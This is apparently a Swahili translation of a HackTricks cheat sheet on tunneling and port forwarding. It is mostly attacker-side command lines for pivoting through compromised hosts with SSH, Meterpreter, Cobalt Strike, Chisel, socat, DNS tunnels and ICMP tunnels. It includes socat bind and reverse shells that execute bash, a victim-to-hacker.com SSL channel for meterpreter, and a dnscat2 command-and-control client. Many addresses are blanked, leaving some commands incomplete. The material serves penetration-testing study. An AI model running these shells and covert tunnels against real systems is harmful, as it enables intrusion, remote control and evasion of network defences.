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# Kuchimba na Kusogeza Bandari
<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Je, unafanya kazi katika **kampuni ya usalama wa mtandao**? Unataka kuona **kampuni yako ikionekana kwenye HackTricks**? au unataka kupata upatikanaji wa **toleo jipya la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.
**Kikundi cha Usalama cha Kujitahidi Kwa Bidii**
<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
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## Sawa ya Nmap
{% hint style="warning" %}
Uchunguzi wa **ICMP** na **SYN** hauwezi kuchimbwa kupitia proksi za socks, hivyo tunapaswa **kulemaza ugunduzi wa ping** (`-Pn`) na kutaja **uchunguzi wa TCP** (`-sT`) ili hii ifanye kazi.
{% endhint %}
## **Bash**
**Mwenyeji -> Rukia -> NdaniA -> NdaniB**
# On the jump server connect the port 3333 to the 5985
mknod backpipe p;
nc -lvnp 5985 0<backpipe | nc -lvnp 3333 1>backpipe
# On InternalA accessible from Jump and can access InternalB
## Expose port 3333 and connect it to the winrm port of InternalB
exec 3<>/dev/tcp/internalB/5985
exec 4<>/dev/tcp/Jump/3333
cat <&3 >&4 &
cat <&4 >&3 &
# From the host, you can now access InternalB from the Jump server
evil-winrm -u username -i Jump
## **SSH**
Unganisho la picha la SSH (X)
ssh -Y -C <user>@<ip> #-Y is less secure but faster than -X
### Bandari ya Mitaani kwenda Bandari
Fungua Bandari Mpya kwenye Seva ya SSH --> Bandari Nyingine
ssh -R user@ #Local port 1521 accessible in port 10521 from everywhere
ssh -R user@ #Remote port 1521 accessible in port 10521 from everywhere
### Port2Port
Bandari ya ndani --> Mwenyeji aliyeathiriwa (SSH) --> Sanduku la tatu:Bandari
ssh -i ssh_key <user>@<ip_compromised> -L <attacker_port>:<ip_victim>:<remote_port> [-p <ssh_port>] [-N -f] #This way the terminal is still in your host
sudo ssh -L 631:<ip_victim>:631 -N -f -l <username> <ip_compromised>
### Port2hostnet (proxychains)
Port ya Mwenyeji --> Mwenyeji Aliyodhuriwa (SSH) --> Mahali Popote
ssh -f -N -D <attacker_port> <username>@<ip_compromised> #All sent to local port will exit through the compromised server (use as proxy)
### Kusonga Porti Nyuma
Hii ni muhimu kupata mabua ya nyuma kutoka kwa mwenyeji wa ndani kupitia eneo la DMZ hadi kwa mwenyeji wako:
ssh -i dmz_key -R <dmz_internal_ip>:443: root@ -vN
# Now you can send a rev to dmz_internal_ip:443 and caputure it in localhost:7000
# Note that port 443 must be open
# Also, remmeber to edit the /etc/ssh/sshd_config file on Ubuntu systems
# and change the line "GatewayPorts no" to "GatewayPorts yes"
# to be able to make ssh listen in non internal interfaces in the victim (443 in this case)
### VPN-Tunnel
Unahitaji **root kwenye vifaa vyote** (kwa kuwa utaunda interfaces mpya) na sshd config inapaswa kuruhusu kuingia kama root:\
`PermitRootLogin yes`\
`PermitTunnel yes`
ssh root@server -w any:any #This will create Tun interfaces in both devices
ip addr add peer dev tun0 #Client side VPN IP
ifconfig tun0 up #Activate the client side network interface
ip addr add peer dev tun0 #Server side VPN IP
ifconfig tun0 up #Activate the server side network interface
Washa uhamishaji upande wa Seva
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -s -o eth0 -j MASQUERADE
Weka njia mpya upande wa mteja
route add -net gw
Unaweza **kutumia kivukio** kupitia **ssh** kusafirisha **trafiki yote** kwenye **mtandao wa sehemu** kupitia mwenyeji.\
Kwa mfano, kusafirisha trafiki yote inayoelekea kwenye
pip install sshuttle
sshuttle -r user@host
unganisha kwa ufunguo wa kibinafsi
sshuttle -D -r user@host 0/0 --ssh-cmd 'ssh -i ./id_rsa'
# -D : Daemon mode
## Meterpreter
### Port2Port
Port ya ndani --> Host iliyovamiwa (kikao cha aktive) --> Sanduku la tatu:Port
# Inside a meterpreter session
portfwd add -l <attacker_port> -p <Remote_port> -r <Remote_host>
SOCKS ni itifaki inayotumiwa kwa kusudi la kusafirisha trafiki ya mtandao kati ya seva na mteja, ikiruhusu mteja kupitisha trafiki yake kupitia seva ya proxy. Itifaki hii inaweza kutumika kwa njia ya tunneling na port forwarding kwa kusudi la kuficha mahali halisi la mteja au kuvuka vizuizi vya mtandao.
background# meterpreter session
route add <IP_victim> <Netmask> <Session> # (ex: route add 8)
use auxiliary/server/socks_proxy
run #Proxy port 1080 by default
echo "socks4 1080" > /etc/proxychains.conf #Proxychains
Njia nyingine:
background #meterpreter session
use post/multi/manage/autoroute
set SESSION <session_n>
set SUBNET <New_net_ip> #Ex: set SUBNET
set NETMASK <Netmask>
use auxiliary/server/socks_proxy
set VERSION 4a
run #Proxy port 1080 by default
echo "socks4 1080" > /etc/proxychains.conf #Proxychains
## Cobalt Strike
### SOCKS proxy
Fungua kituo cha bandari kwenye timu ya seva inayosikiliza kwenye interface zote ambazo zinaweza kutumika kusafirisha trafiki kupitia kwa beacon.
beacon> socks 1080
[+] started SOCKS4a server on: 1080
# Set port 1080 as proxy server in proxychains.conf
proxychains nmap -n -Pn -sT -p445,3389,5985
### rPort2Port
{% hint style="warning" %}
Katika kesi hii, **bandari inafunguliwa kwenye mwenyeji wa ishara**, sio kwenye Seva ya Timu na trafiki inatumwa kwenye Seva ya Timu na kutoka hapo kwenda kwa mwenyeji:bandari ulioonyeshwa
{% endhint %}
rportfwd [bind port] [forward host] [forward port]
rportfwd stop [bind port]
### rPort2Port ya ndani
{% hint style="warning" %}
Katika kesi hii, **bandari inafunguliwa kwenye mwenyeji wa beacon**, sio kwenye Seva ya Timu na **trafiki inatumwa kwa mteja wa Cobalt Strike** (sio kwa Seva ya Timu) na kutoka hapo kwenda kwa mwenyeji:bandari uliyotajwa
{% endhint %}
rportfwd_local [bind port] [forward host] [forward port]
rportfwd_local stop [bind port]
## reGeorg
Unahitaji kupakia faili ya wavuti ya uchimbaji wa faili: ashx|aspx|js|jsp|php|php|jsp
python reGeorgSocksProxy.py -p 8080 -u http://upload.sensepost.net:8080/tunnel/tunnel.jsp
## Chisel
Unaweza kuipakua kutoka kwenye ukurasa wa matoleo ya [https://github.com/jpillora/chisel](https://github.com/jpillora/chisel)\
Unahitaji kutumia **toleo sawa kwa mteja na server**
### socks
./chisel server -p 8080 --reverse #Server -- Attacker
./chisel-x64.exe client R:socks #Client -- Victim
#And now you can use proxychains with port 1080 (default)
./chisel server -v -p 8080 --socks5 #Server -- Victim (needs to have port 8080 exposed)
./chisel client -v socks #Attacker
### Kusonga Bandari
./chisel_1.7.6_linux_amd64 server -p 12312 --reverse #Server -- Attacker
./chisel_1.7.6_linux_amd64 client R:4505: #Client -- Victim
## Rpivot
Mfereji wa nyuma. Mfereji huanzishwa kutoka kwa mwathiriwa.\
Proksi ya socks4 inaundwa kwenye
attacker> python server.py --server-port 9999 --server-ip --proxy-ip --proxy-port 1080
victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999
Pitisha kupitia **proksi ya NTLM**
victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --password P@ssw0rd
victim> python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45
## **Socat**
### Bind shell
victim> socat TCP-LISTEN:1337,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
attacker> socat FILE:`tty`,raw,echo=0 TCP4:<victim_ip>:1337
### Reverse shell
attacker> socat TCP-LISTEN:1337,reuseaddr FILE:`tty`,raw,echo=0
victim> socat TCP4:<attackers_ip>:1337 EXEC:bash,pty,stderr,setsid,sigint,sane
### Port2Port
### Bandari kwenda Bandari
socat TCP4-LISTEN:<lport>,fork TCP4:<redirect_ip>:<rport> &
### Port2Port kupitia soksi
socat TCP4-LISTEN:1234,fork SOCKS4A:,socksport=5678
### Meterpreter kupitia SSL Socat
#Create meterpreter backdoor to port 3333 and start msfconsole listener in that port
attacker> socat OPENSSL-LISTEN:443,cert=server.pem,cafile=client.crt,reuseaddr,fork,verify=1 TCP:
victim> socat.exe TCP-LISTEN:2222 OPENSSL,verify=1,cert=client.pem,cafile=server.crt,connect-timeout=5|TCP:hacker.com:443,connect-timeout=5
#Execute the meterpreter
Unaweza kuzunguka **proxy isiyo na uthibitisho** kwa kutekeleza mstari huu badala ya wa mwisho kwenye konsoli ya mhanga:
### Tuneli ya SSL ya Socat
**Konsoli ya /bin/sh**
Unda vyeti pande zote mbili: Mteja na Seva
# Execute these commands on both sides
openssl genrsa -out $FILENAME.key 1024
openssl req -new -key $FILENAME.key -x509 -days 3653 -out $FILENAME.crt
chmod 600 $FILENAME.key $FILENAME.pem
attacker-listener> socat OPENSSL-LISTEN:433,reuseaddr,cert=server.pem,cafile=client.crt EXEC:/bin/sh
victim> socat STDIO OPENSSL-CONNECT:localhost:433,cert=client.pem,cafile=server.crt
### Port2Port ya Mbali
unganisha bandari ya SSH ya ndani (22) kwenye bandari ya 443 ya mwenyeji wa mshambuliaji
attacker> sudo socat TCP4-LISTEN:443,reuseaddr,fork TCP4-LISTEN:2222,reuseaddr #Redirect port 2222 to port 443 in localhost
victim> while true; do socat TCP4:<attacker>:443 TCP4: ; done # Establish connection with the port 443 of the attacker and everything that comes from here is redirected to port 22
attacker> ssh localhost -p 2222 -l www-data -i vulnerable #Connects to the ssh of the victim
## Plink.exe
Ni kama toleo la konsoli la PuTTY (chaguo zake ni sawa sana na mteja wa ssh).
Kwa kuwa binary hii itatekelezwa kwa mhanga na ni mteja wa ssh, tunahitaji kufungua huduma yetu ya ssh na bandari ili tuweze kuwa na uunganisho wa nyuma. Kisha, kusonga bandari inayopatikana kwa urahisi tu kwenda kwa bandari kwenye mashine yetu:
echo y | plink.exe -l <Our_valid_username> -pw <valid_password> [-p <port>] -R <port_ in_our_host>:<next_ip>:<final_port> <your_ip>
echo y | plink.exe -l root -pw password [-p 2222] -R 9090: #Local port 9090 to out port 9090
## Windows netsh
### Port2Port
Unahitaji kuwa mtawala wa eneo (kwa bandari yoyote)
netsh interface portproxy add v4tov4 listenaddress= listenport= connectaddress= connectport= protocol=tcp
# Example:
netsh interface portproxy add v4tov4 listenaddress= listenport=4444 connectaddress= connectport=4444
# Check the port forward was created:
netsh interface portproxy show v4tov4
# Delete port forward
netsh interface portproxy delete v4tov4 listenaddress= listenport=4444
## SocksOverRDP & Proxifier
Unahitaji kuwa na **upatikanaji wa RDP kwenye mfumo**.\
1. [SocksOverRDP x64 Binaries](https://github.com/nccgroup/SocksOverRDP/releases) - Zana hii hutumia `Dynamic Virtual Channels` (`DVC`) kutoka kwa kipengele cha Huduma ya Desktop ya Mbali ya Windows. DVC inahusika na **kutunza pakiti kupitia uhusiano wa RDP**.
2. [Proxifier Portable Binary](https://www.proxifier.com/download/#win-tab)
Kwenye kompyuta yako ya mteja pakia **`SocksOverRDP-Plugin.dll`** kama hivi:
# Load SocksOverRDP.dll using regsvr32.exe
C:\SocksOverRDP-x64> regsvr32.exe SocksOverRDP-Plugin.dll
Sasa tunaweza **kuunganisha** kwa **muhanga** kupitia **RDP** kutumia **`mstsc.exe`**, na tunapaswa kupokea **kitufe** kikisema kuwa **programu-jalizi ya SocksOverRDP imeanzishwa**, na itakuwa **ikisikiliza** kwenye ****.
**Ungezea** kupitia **RDP** na kupakia & kutekeleza kwenye mashine ya muhanga `SocksOverRDP-Server.exe` binary:
C:\SocksOverRDP-x64> SocksOverRDP-Server.exe
Sasa, hakikisha kwenye mashine yako (mshambuliaji) kwamba bandari 1080 inasikiliza:
netstat -antb | findstr 1080
Sasa unaweza kutumia [**Proxifier**](https://www.proxifier.com/) **kupitia trafiki hiyo kupitia bandari hiyo.**
## Proxify Programu za Windows GUI
Unaweza kufanya programu za Windows GUI zinazotembea kupitia proksi kwa kutumia [**Proxifier**](https://www.proxifier.com/).\
Katika **Profile -> Proxy Servers** ongeza IP na bandari ya seva ya SOCKS.\
Katika **Profile -> Proxification Rules** ongeza jina la programu ya kufanya proksi na uhusiano kwa IPs unazotaka kufanya proksi.
## Kupuuza proksi ya NTLM
Zana iliyotajwa hapo awali: **Rpivot**\
**OpenVPN** pia inaweza kuipuuza, kwa kuweka chaguo hizi katika faili ya usanidi:
http-proxy <proxy_ip> 8080 <file_with_creds> ntlm
### Cntlm
Inathibitisha dhidi ya proxi na kufunga bandari kwa upande wa ndani ambayo inaelekezwa kwa huduma ya nje unayotaja. Kisha, unaweza kutumia chombo unachopendelea kupitia bandari hii.\
Kwa mfano, inaweza kuendesha bandari 443.
Username Alice
Password P@ssw0rd
Tunnel 2222:<attackers_machine>:443
Sasa, ikiwa unaweka kwa mfano kwenye mhanga huduma ya **SSH** kusikiliza kwenye bandari 443. Unaweza kuunganisha kupitia bandari ya 2222 ya mshambuliaji.\
Unaweza pia kutumia **meterpreter** inayounganisha kwa localhost:443 na mshambuliaji anasikiliza kwenye bandari 2222.
Proksi ya nyuma iliyoundwa na Microsoft. Unaweza kuipata hapa: [https://github.com/microsoft/reverse-proxy](https://github.com/microsoft/reverse-proxy)
## DNS Tunneling
### Iodine
Root inahitajika kwenye mifumo yote kujenga viunganishi vya tun na kufanya data ya mtaro kati yao kutumia matakwa ya DNS.
attacker> iodined -f -c -P P@ssw0rd tunneldomain.com
victim> iodine -f -P P@ssw0rd tunneldomain.com -r
#You can see the victim at
Tunnel itakuwa polepole sana. Unaweza kuunda uhusiano wa SSH uliopimwa kupitia handaki hili kwa kutumia:
ssh <user>@ -C -c blowfish-cbc,arcfour -o CompressionLevel=9 -D 1080
### DNSCat2
[**Pakua hapa**](https://github.com/iagox86/dnscat2)**.**
Inaanzisha njia ya C\&C kupitia DNS. Haitaji mamlaka ya msingi.
attacker> ruby ./dnscat2.rb tunneldomain.com
victim> ./dnscat2 tunneldomain.com
# If using it in an internal network for a CTF:
attacker> ruby dnscat2.rb --dns host=,port=53,domain=mydomain.local --no-cache
victim> ./dnscat2 --dns host=,port=5353
#### **Kwa PowerShell**
Unaweza kutumia [**dnscat2-powershell**](https://github.com/lukebaggett/dnscat2-powershell) kutekeleza mteja wa dnscat2 kwenye powershell:
Import-Module .\dnscat2.ps1
Start-Dnscat2 -DNSserver -Domain mydomain.local -PreSharedSecret somesecret -Exec cmd
#### **Kusonga mbele kwa kutumia dnscat**
session -i <sessions_id>
listen [lhost:]lport rhost:rport #Ex: listen, this bind 8080port in attacker host
#### Badilisha DNS ya proxychains
Proxychains inakamata wito wa libc wa `gethostbyname` na kufanya ombi la DNS la tcp kupitia proksi ya socks. Kwa **chaguo-msingi** serveri ya **DNS** ambayo proxychains hutumia ni **** (imeandikwa kikamilifu). Ili kubadilisha, hariri faili: _/usr/lib/proxychains3/proxyresolv_ na ubadilishe IP. Ikiwa uko katika mazingira ya **Windows** unaweza kuweka IP ya **domain controller**.
## Mita Mita katika Go
## Tunnels ya ICMP
### Hans
Mizizi inahitajika katika mifumo yote miwili ili kuunda viunganishi vya tun na kutuma data kati yao kwa kutumia maombi ya ping ya ICMP.
./hans -v -f -s -p P@ssw0rd #Start listening ( is IP of the new vpn connection)
./hans -f -c <server_ip> -p P@ssw0rd -v
ping #After a successful connection, the victim will be in the
### ptunnel-ng
[**Pakua hapa**](https://github.com/utoni/ptunnel-ng.git).
# Generate it
sudo ./autogen.sh
# Server -- victim (needs to be able to receive ICMP)
sudo ptunnel-ng
# Client - Attacker
sudo ptunnel-ng -p <server_ip> -l <listen_port> -r <dest_ip> -R <dest_port>
# Try to connect with SSH through ICMP tunnel
ssh -p 2222 -l user
# Create a socks proxy through the SSH connection through the ICMP tunnel
ssh -D 9050 -p 2222 -l user
## ngrok
**[ngrok](https://ngrok.com/) ni chombo cha kufunua suluhisho kwa Mtandao kwa amri moja.**
*URI za Ufunuo ni kama:* **UID.ngrok.io**
### Usakinishaji
- Unda akaunti: https://ngrok.com/signup
- Pakua Mteja:
tar xvzf ~/Downloads/ngrok-v3-stable-linux-amd64.tgz -C /usr/local/bin
chmod a+x ./ngrok
# Init configuration, with your token
./ngrok config edit
### Matumizi ya Msingi
**Nyaraka:** [https://ngrok.com/docs/getting-started/](https://ngrok.com/docs/getting-started/).
*Pia niwezekana kuongeza uthibitisho na TLS, ikiwa ni lazima.*
#### Kufanya Barabara ya TCP
# Pointing to
./ngrok tcp 4444
# Example of resulting link: 0.tcp.ngrok.io:12345
# Listen (example): nc -nvlp 4444
# Remote connect (example): nc $(dig +short 0.tcp.ngrok.io) 12345
#### Kufunua faili kwa kutumia HTTP
./ngrok http file:///tmp/httpbin/
# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/
#### Kuchunguza wito wa HTTP
*Inatumika kwa XSS, SSRF, SSTI ...*
Moja kwa moja kutoka kwa stdout au kwenye kiolesura cha HTTP [](
#### Kutunelisha huduma ya ndani ya HTTP
./ngrok http localhost:8080 --host-header=rewrite
# Example of resulting link: https://abcd-1-2-3-4.ngrok.io/
# With basic auth
./ngrok http localhost:8080 --host-header=rewrite --auth="myuser:mysuperpassword"
#### Mfano rahisi wa usanidi wa ngrok.yaml
Inafungua njia 3:
- 2 TCP
- 1 HTTP na ufunuo wa faili za static kutoka /tmp/httpbin/
addr: 4444
proto: tcptunne
addr: 5555
proto: tcp
proto: http
addr: file:///tmp/httpbin/
## Vifaa vingine vya kuangalia
* [https://github.com/securesocketfunneling/ssf](https://github.com/securesocketfunneling/ssf)
* [https://github.com/z3APA3A/3proxy](https://github.com/z3APA3A/3proxy)
**Kikundi cha Usalama cha Kujitahidi**
<figure><img src="../.gitbook/assets/telegram-cloud-document-1-5159108904864449420.jpg" alt=""><figcaption></figcaption></figure>
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<summary><strong>Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>
* Je! Unafanya kazi katika **kampuni ya usalama wa mtandao**? Je! Unataka kuona **kampuni yako ikitangazwa kwenye HackTricks**? au unataka kupata ufikiaji wa **toleo jipya zaidi la PEASS au kupakua HackTricks kwa PDF**? Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com)
* **Jiunge na** [**💬**](https://emojipedia.org/speech-balloon/) [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **nifuata** kwenye **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa [repo ya hacktricks](https://github.com/carlospolop/hacktricks) na [repo ya hacktricks-cloud](https://github.com/carlospolop/hacktricks-cloud)**.